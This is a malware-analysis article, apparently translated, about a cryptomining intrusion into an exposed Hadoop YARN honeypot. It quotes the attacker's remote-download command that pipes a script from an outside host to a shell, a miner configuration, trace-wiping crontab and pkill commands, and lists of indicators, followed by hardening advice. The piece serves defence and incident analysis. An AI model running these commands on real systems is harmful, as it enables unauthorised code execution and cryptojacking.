NOTICE TO READERS: THIS ARTICLE IS INTENDED FOR CYBERSECURITY PROFESSIONALS.
DO NOT RESTORE THE PUBLISHED LINKS!
You do not realize the complexity of certain subjects if not when you clash, and it's usually too late.
To try to make people understand what "cyber" means, these last few nights I put on the computer and, for educational purposes, I created an HDFS environment1 not protected to understand what could happen in case of an installation and configuration of an environment not properly "hardenized" or controlled, or the most common case of installations performed by unskilled or not particularly careful technical staff.
What will be reported is how there is a security problem with the Hadoop Yarn resource management system (unauthorized access in the REST APIs2) with which you can remotely execute arbitrary code. Once the infrastructure was created, I simply waited for the development of the events. After a week I found that the infrastructure created was attacked and compromised.
I then proceeded to analyze one of the cases of compromise and will provide advice and security solutions to overcome this problem.
The chosen case is a case of mining di cryptocurrency
For a start let's try to understand something more about the infrastructure used as "honeypot3".
Hadoop is a distributed system infrastructure developed by the Apache Foundation, a unified resource management platform for hadoop systems, whose primary role is to achieve unified management and cluster resource planning (generally used to manage data such as species of File System distributed). The framework Calculation MapReduce can be executed as an application program. Above is the YARN system, the resources are managed via YARN. Simply put, a user can send specific application programs to YARN for execution that may include executing their system commands.
YARN provides the REST APIs, which are open by default on the 8088 and 8090 ports, for this reason, any user, through the APIs can perform the sending of activities and other operations in direct mode. If they are configured incorrectly, the REST APIs will be opened in the public network (for example on the Internet, if you decide to use a cluster HDFS on Cloud) and will allow unauthorized access to the created system. Ultimately, therefore, the bad configuration makes sure that any attacker can use the infrastructure for the execution of remote commands, in order to conduct operations of mining4 or other malicious activities on the system.
Why is this kind of activity very subtle?
Because it is difficult to insert security systems into HDFS clusters or to use systems to enable Kerberos authentication, preventing anonymous access (upgrading the versions), or checking the monitoring on them, this is because these structures are born in order to maximize the performance of a system used to run Query ed analytics already in itself expensive from a computational point of view.
Passes of the malevolent activity found
-
Intrusion analysis
On the machine used as bait it has been installed and configured in default mode Hadoop YARN, this in itself causes a problem of unauthorized access security to the system. THE'intruder directly uses the REST API open on the 8088 port, after a crawler5 specifically identifies a set of open doors pre-configured by the performer. At this point, theintruder can send execution commands to download and execute a script6 .sh in the server (attached 1 the whole script found, cr.sh). More download they will subsequently start the process of mining.
The whole process is relatively simple and well structured and you can see by reading the script that nothing is left to chance, such as some checks that are performed on the server Guest Hadoop.
The command found and executed is interesting:
exec / bin / bash -c "curl 185.222.210.59/cr.sh | sh & disown"
I dwell on this command to highlight two very important aspects that is the IP address from which the script is downloaded and some activities that serve to mask malicious activities7.
If we continue in the analysis of the code within the cr.sh script it is easy to notice that the author of the same has placed particular attention in eliminating the traces of the performed activities.8.
At this point, in summary, we can say that the whole script is very detailed and it seems that every function is nested and called, many files are involved involved in the whole process, so we can report the main steps according to the following lineup:
-
Clean up related crontab processes, files and activities;
-
Judge and download the program mining, check the MD5 value at the same time, in addition to the checked server, also use https: // transfer.sh to provide the download of backup;
-
Adds execution activity of the download the script in crontab.
The main indicators that emerged from the analysis are the following:
-
185.222.210.59;
-
cr.sh
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
-
http:// 185.222.210.59/re.php
-
xmrig_64 or xmrig_32
We will check with an OSINF cycle9 the indicators above.
-
185.222.210.59
We try to verify the origins of this IP address. The following main fields are shown in the figure below:
In some forums10 of producers / companies to release platforms based on HDFS, the IP address and the exact string found also in our script are reported, asking for explanations. In some cases it asks if it is a standard configuration. All thanks to some HDFS administrators who perform hand and aperiodic checks, there is no automatism.
By going to check the operation of the server, you get the following:
OS |
Debian |
Protocols |
80 / HTTP and 22 / SSH |
-
80 / HTTP
GET / |
|
Server & Hosting |
Apache httpd 2.4.10 |
Status Line |
200 OK |
Page Title |
Apache2 Debian Default Page: It works |
GET / |
-
22 / SSH
SSHv2 Handshake |
|
Server & Hosting |
OpenSSH 6.7p1 |
Banner |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Host Key |
|
Algorithm |
ecdsa-sha2-nistp256 |
Fingerprint |
5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40 |
Negotiated Algorithm |
|
Key Exchange |
curve25519- sha256 @ libssh .org |
Symmetric Cipher |
aes128-ctr | aes128-ctr |
MAC |
hmac-sha2-256 | HMAC-sha2-256 |
It has also been verified that the open 111 port exists that corresponds to the portmap service. Therefore from the side server is the portmapper listening on the 111 port (portmapper), from the side client there are a number of programs that, for any RPC service11, must first contact the portmapper remote which provides them with the information necessary to establish a connection with the daemon competent. A possible vulnerability in the service could also be verified, but it is not the object of the research and the analysis activity.
So the server in question is "connected" and probably maintained via the 22 port with the ssh protocol, which guarantees the encrypted connection. From the field 22.ssh.v2.server_host_key.fingerprint_sha256, ie from fingerprint of the server's ssh, searches show that there are no others.
It is also reported as in the 80.http.get.headers.last_modified the date of Wed is shown, 16 May 2018 14: 58: 53 GMT
Il server belongs to the addressing availability of the company of PRISM BUSINESS SERVICES LTD, which from the main site http: // www. prismbusiness.co.uk/about-us/ appears not to have to do with activities related to the technical sector of ICT, but in other fields. If they have active servers in a context cloud, perhaps configured and / or otherwise managed when needed, may be unaware of their current use.
The entire net of their availability is shown:
There is no DNS resolution on the analyzed IP.
-
cr.sh
Lo script cr.sh which has been analyzed has the following MD5 48e79f8de26fa56d955a28c2de493132, however, there is no evidence of indexing on the internet.
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
The MD5 reported, correspond to the files downloaded during the execution of the script and are shown in the table below:
File name |
MD5 |
xmrig_64 |
c8c1f2da51fbd0aea60e11a81236c9dc |
xmrig_32 |
5110222de7330a371c83af67d46c4242 |
The files shown above are the core of the execution of the Proof of Work (PoW) of one cryptocurrency well known, it is indeed Monero.
-
https:// transfer.sh/ixQBE/zzz
Interesting is the use of transfer.sh, which turns out to be one Tactics, Techniques and Procedures (TTPs) of the behavior of this intruder, which obtains a back-up for the download of the executables data mining.
In fact, it has been found that transfer.sh is nothing more than quick and easy file sharing from the command line. This code contains the server with everything you need to create your own instance ", all available for download at https: // github.com/dutchcoders/transfer.sh and on a website https: // transfer.sh/ where there are explanations of use with use case to be able to easily integrate and configure it. The process of code reuse is nowadays widely used both in contexts of cyber Crime that of much wider contexts than Cyber Espionage o Cyber Intelligenge.
-
http:// 185.222.210.59/g.php
The page today, 02 June 2018, responds with an IP address 95.142.40.81, while at the time of the discovery of the script the IP address displayed was the 46.30.42.162. Both have the same behavior, entered as the f1 variable, after the checks made with getconf LONG_BIT, the xmrig_64 or xmrig_32 executables are downloaded. Obviously this allows, if found malicious a first IP address, but not the IP of control and management 185.222.210.59, to make unnecessary some security controls such as Blacklist da Firewall, non-granular categorizations of Websense o warning of SIEM available to a SOC.
Let's see if we can derive something from the two IP addresses:
46.30.42.162
The address results in the availability of Eurobyte VPS, and the addressing carries a class of 24 bar addresses in the availability of this Hosting, which is of Russian origin.
This also server, results in having the 22 and 80 ports open, with Debian Operating System.
Below are the details found:
OS |
Debian |
Network |
MCHOST - AS (RU) |
Routing |
46.30.42.0 / 24 via AS7018, AS3356, AS35415, AS48282 |
Protocols |
80 / HTTP and 22 / SSH |
-
80 / HTTP
GET / |
|
Server & Hosting |
Apache httpd 2.4.10 |
Status Line |
200 OK |
Page Title |
Apache2 Debian Default Page: It works |
GET / |
-
22 / SSH
SSHv2 Handshake |
|
Server & Hosting |
OpenSSH 6.7p1 |
Banner |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Host Key |
|
Algorithm |
ecdsa-sha2-nistp256 |
Fingerprint |
3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad |
Negotiated Algorithm |
|
Key Exchange |
curve25519- sha256 @ libssh .org |
Symmetric Cipher |
aes128-ctr | aes128-ctr |
MAC |
hmac-sha2-256 | HMAC-sha2-256 |
It is noted that a search based on the Fingerprint of the Host Key, shows that there are other 41 servers with the same signature. Of these 41 servers, even the new 95.142.40.81 IP address is in the availability of the intruder.
With this data we can probably assume that we have found one pool first level infrastructure of this single intruder or group of Cyber Crime.
The addressing and any information useful for subsequent activities are reported:
95.142.40.74 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.249 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.40.89 (vz229526.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.40.190 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.40.189 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.47.115 (vz227413.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.39.241 (shimshim.info) |
AS (48282) Russia location.country: Russia mysql database |
95.142.40.188 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.41.207 (vz230806.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.41.182 (vz230501.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.39.251 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.67 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.65 (profshinservice.ru) |
AS (48282) Russia location.country: Russia |
46.30.45.91 (vz220153.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.46 (server.badstudio.ru) |
AS (48282) Russia location.country: Russia |
46.30.41.80 (track.dev) |
AS (48282) Russia location.country: Russia |
46.30.45.152 (vz230274.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.72 (vz231895.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.137 (vz224405.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.39.151 (donotopen.ru) |
AS (48282) Russia location.country: Russia mysql database |
185.154.52.117 (vz230686.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.47.157 (vz228859.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.40.83 (vz228857.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.40.86 (kolos1952.ru) |
AS (48282) Russia location.country: Russia mysql database |
95.142.40.81 (vz228855.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.42.162 (server.com) |
AS (48282) Russia location.country: Russia |
95.142.40.82 (vz228856.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.43.128 (vz228757.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.52.236 (supportt.ru) |
AS (48282) Russia location.country: Russia mysql database |
95.142.39.109 (vz228627.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.40.44 (vz229990.eurodir.ru) |
AS (48282) Russia location.country: Russia |
95.142.39.164 (vz232259.eurodir.ru) |
AS (48282) Russia location.country: Russia |
46.30.45.30 (shop.engine) |
AS (48282) Russia location.country: Russia |
95.142.39.172 (hosted-by.wikhost.com) |
AS (48282) Russia location.country: Russia mysql database |
185.154.52.161 (piar60.ru) |
AS (48282) Russia location.country: Russia mysql database |
95.142.40.87 (regiister.ru) |
AS (48282) Russia location.country: Russia mysql database |
95.142.40.88 (buled.ru) |
AS (48282) Russia location.country: Russia mysql database |
185.154.53.190 (vz228963.eurodir.ru) |
AS (48282) Russia location.country: Russia mysql database |
46.30.41.51 (vz225213.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.53.108 (vz224405.eurodir.ru) |
AS (48282) Russia location.country: Russia |
185.154.52.181 (vz224405.eurodir.ru) |
AS (48282) Russia location.country: Russia |
These instead the metadata concerning the analysis of the IP 41 above:
All the addresses found, refer to AS MCHOST-AS, RU:
1-th Street Frezernaiy, 2 / 1 XENUMX strokes
109202 Moscow
RUSSIAN FEDERATION
phone: + 7 495 6738456
fax: + 7 495 6738456
e-mail: info (at) mchost (dot) ru
Areas serviced: RU
-
http:// 185.222.210.59/w.conf
Oggi:
{
"algo": "cryptonight",
"background": true,
"colors": false,
"retries": 5,
"retry-pause": 5,
"donate-level": 1,
"syslog": false,
"log-file": null,
"print-time": 60,
"av": 0,
"safe": false,
"max-cpu-usage": 95,
"cpu-priority": 4,
"threads": null,
"pools": [
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"user": "h",
"pass": "h",
"keepalive": true,
"nicehash": false,
"variant": -1
}
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
At the time of the discovery of the script:
{
"algo": "cryptonight",
"background": true,
"colors": false,
"retries": 5,
"retry-pause": 5,
"donate-level": 1,
"syslog": false,
"log-file": null,
"print-time": 60,
"av": 0,
"safe": false,
"max-cpu-usage": 95,
"cpu-priority": 4,
"threads": null,
"pools": [
{
"url": "stratum + tcp: // 179.60.146.10: 5556",
"user": "h",
"pass": "h",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"user": "h",
"pass": "h",
"keepalive": true,
"nicehash": false,
"variant": -1
}
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
It is important to underline how the conf file defines two important indicators for the analysis phase (we can also define three):
-
stratum + tcp: // 46.30.43.159: 80 (in common on different dates);
-
stratum + tcp: // 179.60.146.10: 5556 (only in the first find);
-
"algo": "cryptonight";
Let's analyze first IP in common 46.30.43.159. This IP address, in the availability of Eurobyte VPS, Russian, has as PTR vz230703.eurodir.ru and is part of a net 46.30.43.0 / 24. The PTR of the IPs of the NET, attached 1 shows the whole class, they have something special. I report in the table below the PTR with similarity without the field A, I'm 41:
IP |
PTR |
46.30.43.13 |
vz94180.eurodir.ru |
46.30.43.17 |
vz203045.eurodir.ru |
46.30.43.21 |
vz206109.eurodir.ru |
46.30.43.23 |
vz216100.eurodir.ru |
46.30.43.24 |
vz174272.eurodir.ru |
46.30.43.30 |
vz35015.eurodir.ru |
46.30.43.57 |
vz78210.eurodir.ru |
46.30.43.58 |
vz229754.eurodir.ru |
46.30.43.61 |
vz35015.eurodir.ru |
46.30.43.64 |
vz38207.eurodir.ru |
46.30.43.66 |
vz86195.eurodir.ru |
46.30.43.70 |
vz173527.eurodir.ru |
46.30.43.77 |
vz174931.eurodir.ru |
46.30.43.79 |
vz195563.eurodir.ru |
46.30.43.82 |
vz197086.eurodir.ru |
46.30.43.90 |
vz120816.eurodir.ru |
46.30.43.93 |
vz173527.eurodir.ru |
46.30.43.98 |
vz94065.eurodir.ru |
46.30.43.101 |
vz216360.eurodir.ru |
46.30.43.102 |
vz195005.eurodir.ru |
46.30.43.123 |
vz212299.eurodir.ru |
46.30.43.128 |
vz228757.eurodir.ru |
46.30.43.130 |
vz168899.eurodir.ru |
46.30.43.156 |
vz195735.eurodir.ru |
46.30.43.159 |
vz230703.eurodir.ru |
46.30.43.161 |
vz171964.eurodir.ru |
46.30.43.166 |
vz123353.eurodir.ru |
46.30.43.170 |
vz224733.eurodir.ru |
46.30.43.172 |
vz226924.eurodir.ru |
46.30.43.184 |
vz171966.eurodir.ru |
46.30.43.186 |
vz162078.eurodir.ru |
46.30.43.214 |
vz207073.eurodir.ru |
46.30.43.219 |
vz110518.eurodir.ru |
46.30.43.224 |
vz98980.eurodir.ru |
46.30.43.226 |
vz100250.eurodir.ru |
46.30.43.229 |
vz110562.eurodir.ru |
46.30.43.232 |
vz228251.eurodir.ru |
46.30.43.237 |
vz162078.eurodir.ru |
46.30.43.244 |
vz207073.eurodir.ru |
46.30.43.245 |
vz174272.eurodir.ru |
46.30.43.246 |
vz157495.eurodir.ru |
Also in this case, the manager may not be aware that some of these servers under its availability, are used for third-party purposes, however should be analyzed one by one, to find further similarities.
Analyzing the 179.60.146.10instead we have the following:
ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ
Port 22, 111, 5555 result open and this too server uses OpenSSHVersion: 6.7p1 Debian 5 + deb8u3
Unfortunately there is no other evidence.
Cryptonight instead, it is a strong indicator of what you want to do, once you hit the target. Specifically, the aim is to undermine the blocks of the cryptocurrency of Monero, entering the target within a pool available dell'intruder. The choice is not random. The protocol Cryptonight It has been studied to be adopted by miner that do not have the availability of ASIC or cluster of very expensive graphics cards, but you can use the classic CPUs of PC, Notebook or MiniPC.
Indeed, the CryptoNight is used for the mining of those coins characterized by the CryptoNote protocol. It is a function strictly bound to memory (memory hard hash), in this case to the third level cache memory of the CPUs as it is focused on the latency. This constraint was imposed to make the CryptoNight inefficient on systems such as GPU and FPGA, not equipped with cache memory and therefore disadvantaged to the use of the algorithm.
The dimensions of the scratchpad of the CryptoNight are about 2 MB of memory for each instance due to the following reasons:
-
it can be contained in the L3 (per core) caches of modern processors;
-
an internal memory of a megabyte è a unacceptable size for the traditional ASIC pipeline;
-
GPUs can run hundreds of thread but they have a much worse latency than the L3 cache of modern CPUs;
-
a significant expansion of the scratchpad would require an increase in interactions. If a node spent a considerable amount of time on the hash of a block, it could easily be flooded with a mechanism flooding of false blocks causing a DDoS.
Upgrade
Just in these days, there has been a modification of the script cr.sh, of the configuration files and executables.
The download of the executables for the date mining it is obtained from the 95.142.40.83 IP address, which led to identifying via the fingerprint of the ssh key, additional IP addresses available to theintruder.
The table below shows the details of 20 on 65 IP addresses, since you do not have the possibility to get them all in bulk (time scarcity and account paid not available) with the same keys ssh and the same configurations.
95.142.39.233 vz231616.eurodir.ru |
McHost.Ru Added on 2018-06-03 03: 44: 26 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.43.128 vz228757.eurodir.ru |
EuroByte LLC Added on 2018-06-03 03: 35: 03 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.47.107 vz227413.eurodir.ru |
EuroByte LLC Added on 2018-06-03 03: 15: 02 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.41.182 vz230501.eurodir.ru |
EuroByte LLC Added on 2018-06-02 21: 01: 28 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.47.21 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Added on 2018-06-02 16: 48: 39 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
95.142.40.188 vz232259.eurodir.ru |
McHost.Ru Added on 2018-06-02 12: 58: 55 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.45.30 shop.engine |
EuroByte LLC Added on 2018-06-02 09: 45: 16 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
95.142.40.81 vz228855.eurodir.ru |
McHost.Ru Added on 2018-06-02 07: 11: 32 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
185.154.53.137 vz224405.eurodir.ru |
EuroByte LLC Added on 2018-06-02 07: 04: 48 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.47.82 vz227413.eurodir.ru |
EuroByte LLC Added on 2018-06-02 04: 55: 14 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
185.154.53.67 vz232259.eurodir.ru |
EuroByte LLC Added on 2018-06-02 03: 45: 39 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
95.142.40.87 regiister.ru |
McHost.Ru Added on 2018-06-01 22: 04: 23 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.47.66 vz227407.eurodir.ru |
EuroByte LLC Added on 2018-06-01 18: 17: 26 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
185.154.52.236 supportt.ru |
EuroByte LLC Added on 2018-06-01 11: 27: 17 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.47.35 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Added on 2018-06-01 11: 07: 16 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
185.154.53.46 server.badstudio.ru |
EuroByte LLC Added on 2018-06-01 07: 22: 23 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
95.142.40.89 vz229526.eurodir.ru |
McHost.Ru Added on 2018-05-31 14: 07: 45 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
46.30.42.162 server.com |
EuroByte LLC Added on 2018-05-31 12: 56: 26 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
95.142.39.102 vz222177.eurodir.ru |
McHost.Ru Added on 2018-05-31 10: 05: 30 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
95.142.40.86 kolos1952.ru |
McHost.Ru Added on 2018-05-31 09: 42: 31 GMT Russian Federation SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Key type: ssh-rsa |
Here are some detailed graphs:
In addition, the downloadable files are shown as follows:
File name |
MD5 |
xm64 |
183664ceb9c4d7179d5345249f1ee0c4 |
xm32 |
b00f4bbd82d2f5ec7c8152625684f853 |
In addition to the above, in script, the following commands are present:
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf / tmp / pscd *
rm -rf / var / tmp / pscd *
crontab -l | sed '/ 192.99.142.232 / d' | crontab -
crontab -l | sed '/ 192.99.142.226 / d' | crontab -
crontab -l | sed '/ 192.99.142.248 / d' | crontab -
crontab -l | sed '/ logo4 / d' | crontab -
crontab -l | sed '/ logo9 / d' | crontab -
crontab -l | sed '/ logo0 / d' | crontab -
The use of the sed command, which is not frequent in the programming, is immediately evident, therefore it too could end up among the TTPs used by the hostile actor.
Sed is one stream editor, used to perform text transformations on an input stream (a file or an input from a pipeline); it is the ability of sed to filter the text in a pipeline that distinguishes it in a particular way from other types of editors.
In this context it is used to eliminate any trace from cron activities. Probably, there are intrusion activities not known to the analysis, as they are derived from past activities that then changed to obtain what was expected.
Doing an analysis of IP addresses 192.99.142.232, 192.99.142.226, 192.99.142.248, we obtain that the company (ISP) of reference is OVH Hosting with location in Canada.
All have 22 port connectivity, ssh. If however they are considered as malevolent IP addresses, for example referring to what is reported in the link https://www. joesandbox.com/index.php/analysis/49178/0/executive, where a use of powershell is declared, enriching the search we verify that the IP address 192.99.142.232 has the same fingerprint as the IP 85.214.102.143 located in Germany in the availability of the ISP Strato AG. However, the address has a certificate 443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b which also binds it to the following IPs: 85.214.125.15 (emma.smartmessaging.com) Debian OS meters, and to IP 85.214.60.153. busware.de) OS Debian.
from |
To Fingerprint ssh |
Fingerprint tls |
192.99.142.232 |
85.214.102.143 |
85.214.125.15 |
85.214.60.153 |
As for IP 192.99.142.248, refer to the figure below, which shows what has been expressed up to now in the document.
You do not have significant details for the other IP address 192.99.142.226
Safety advice
-
Use the top to see the process and kill the abnormal process.
-
Check the directory / tmp and / var / tmp and delete i fillet like java, ppc, ppl3, config.json and w.conf
-
Check the list of activities crontab and eliminate anomalies
-
Analysis of the YARN logs, confirms the anomalous application, elimination of processing.
Security reinforcement
-
Configure the access policies via iptables o security groups to restrict access to ports such as 8088;
-
if it is not necessary, do not open the interface in the public network and modify it in local or intranet calls;
-
update Hadoop to 2.x and enable Kerberos authentication to prevent anonymous access.
IOC
Address of the wallet
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
-
MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc
-
MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242
-
MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4
-
MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853
-
MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32
-
MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132
-
MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6
-
MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829
Addresses in order of priority
-
185.222.210.59 (appears to be source IP);
-
46.30.43.159 (connection to the pool ofintruder, procollo stratum + tcp);
-
179.60.146.10 (connection to the pool ofintruder, procollo stratum + tcp);
-
95.142.40.83 (download file of data mining);
-
95.142.40.81 (download file of data mining);
-
46.30.42.162 (download file of data mining);
-
192.99.142.248 (connection to evasion activities);
-
192.99.142.232 (connection to evasion activities);
-
192.99.142.226 (connection to evasion activities);
-
85.214.102.143 (fingerprint common with addresses above);
-
85.214.125.15 (fingerprint common with addresses above);
-
85.214.60.153 (fingerprint common with above mentioned addresses).
Addresses of suspected belonging to the availability ofintruder
185.154.52.117 (vz230686.eurodir.ru) |
185.154.52.161 (piar60.ru) |
185.154.52.181 (vz224405.eurodir.ru) |
185.154.52.236 (supportt.ru) |
185.154.53.108 (vz224405.eurodir.ru) |
185.154.53.137 (vz224405.eurodir.ru) |
185.154.53.190 (vz228963.eurodir.ru) |
185.154.53.249 (vz232259.eurodir.ru) |
185.154.53.46 (server.badstudio.ru) |
185.154.53.65 (profshinservice.ru) |
185.154.53.67 (vz232259.eurodir.ru) |
185.154.53.72 (vz231895.eurodir.ru) |
46.30.41.182 (vz230501.eurodir.ru) |
46.30.41.207 (vz230806.eurodir.ru) |
46.30.41.51 (vz225213.eurodir.ru) |
46.30.41.80 (track.dev) |
46.30.42.162 (server.com) |
46.30.43.128 (vz228757.eurodir.ru) |
46.30.45.152 (vz230274.eurodir.ru) |
46.30.45.30 (shop.engine) |
46.30.45.91 (vz220153.eurodir.ru) |
46.30.47.115 (vz227413.eurodir.ru) |
46.30.47.157 (vz228859.eurodir.ru) |
95.142.39.109 (vz228627.eurodir.ru) |
95.142.39.151 (donotopen.ru) |
95.142.39.164 (vz232259.eurodir.ru) |
95.142.39.172 (hosted-by.wikhost.com) |
95.142.39.241 (shimshim.info) |
95.142.39.251 (vz232259.eurodir.ru) |
95.142.40.188 (vz232259.eurodir.ru) |
95.142.40.189 (vz232259.eurodir.ru) |
95.142.40.190 (vz232259.eurodir.ru) |
95.142.40.44 (vz229990.eurodir.ru) |
95.142.40.74 (vz232259.eurodir.ru) |
95.142.40.81 (vz228855.eurodir.ru) |
95.142.40.82 (vz228856.eurodir.ru) |
95.142.40.83 (vz228857.eurodir.ru) |
95.142.40.86 (kolos1952.ru) |
95.142.40.87 (regiister.ru) |
95.142.40.88 (buled.ru) |
95.142.40.89 (vz229526.eurodir.ru) |
95.142.39.233 (vz231616.eurodir.ru) |
185.154.53.46 (server.badstudio.ru) |
46.30.47.107 (vz227413.eurodir.ru) |
46.30.47.21 (vz227411.eurodir.ru) |
46.30.47.35 (vz227411.eurodir.ru) |
46.30.47.66 (vz227407.eurodir.ru) |
46.30.47.82 (vz227413.eurodir.ru) |
95.142.39.102 (vz222177.eurodir.ru) |
Conclusions
For those who have arrived to the end, it is right to conclude, underlining how operating systems have been used standard such as Ubuntu and Windows 7.
The entire process has also been replicated on Operating Systems such as those mentioned above with a positive outcome and it could also be assumed that IoT devices.
I think it is very complicated to interrupt or even notice a similar threat if it is addressed to the IoTs, the lack of knowledge of the basic systems, the lack of security, but above all the scarce security systems we can use to manage the use of IoTs. daily.
Unfortunately I have not carried out any tests on any IoT, so I can not say with certainty the correct functioning of the whole process described.
I would like to conclude with a provocation, underlining another aspect regarding the use of cryptominer. In fact it can not be excluded that Cyber Crime uses i cryptominer to subsidize campaigns malware much more sophisticated as those inherent in the APTs12 also of parastatal origin, considering the possibility of self-financing with the approval of the government for which the "hacker" group works or with whom it has collaborations. Factors related to complete anonymity from Operations in the domain Cyber, allow, high margins of deception, making such activities particularly profitable from the point of view market, through the ability to manage easily False Flag Operations and of "to direct"The attribution to third parties that are not related to them.
Finally, a final consideration on the difficulty related to the execution of these analyzes. The difficulty that readers may have found in reading the analysis is the mirror of the difficulty in executing it, but if you want to play with a non-marginal role in the cyber chessboard it is essential to have prepared and aware people, able to analyze and implement the remedies needed on real systems, generally much more complex than the one I created for educational purposes.
1 HDFS: HDFS refers to Hadoop Distributed File System. It is a File System built with a new Open Source technology that supports a hierarchical system of files and directories that are distributed on the storage nodes managed by Hadoop. To learn more: https: // www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/
2 REST API: Application Programming Interface REpresentational State Transfer. On the whole these are indications of the developer of the code useful for determining how the data used by the application should be transmitted.
3 In general it is called honey pot when referring to something created specifically to attract an attacker, in practice it is a trap created to make sure that an attacker is revealed.
4 The term mining generally refers to the execution of calculations in order to create cryptocurrency through the execution of complex calculations.
5 A crawler is software that automatically scans a network for vulnerabilities.
6 A script is nothing more than a file containing a sequence of commands.
7 In particular, you can clearly see how to download and run a called script cr.sh from the IP address 185.222.210.59 and you use the command sh & disownthat is, the process is performed within the instance of bash current of the terminal, in background, but the process is detached from the list jobs di bash (ie the process is not listed as a bash job in the foreground /background); therefore it is used to delete / remove jobs or to tell the shell not to send an HUP signal using the disclaimer command.
8 pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
#ps ax | grep / tmp / yarn | grep -v grep | xargs kill -9
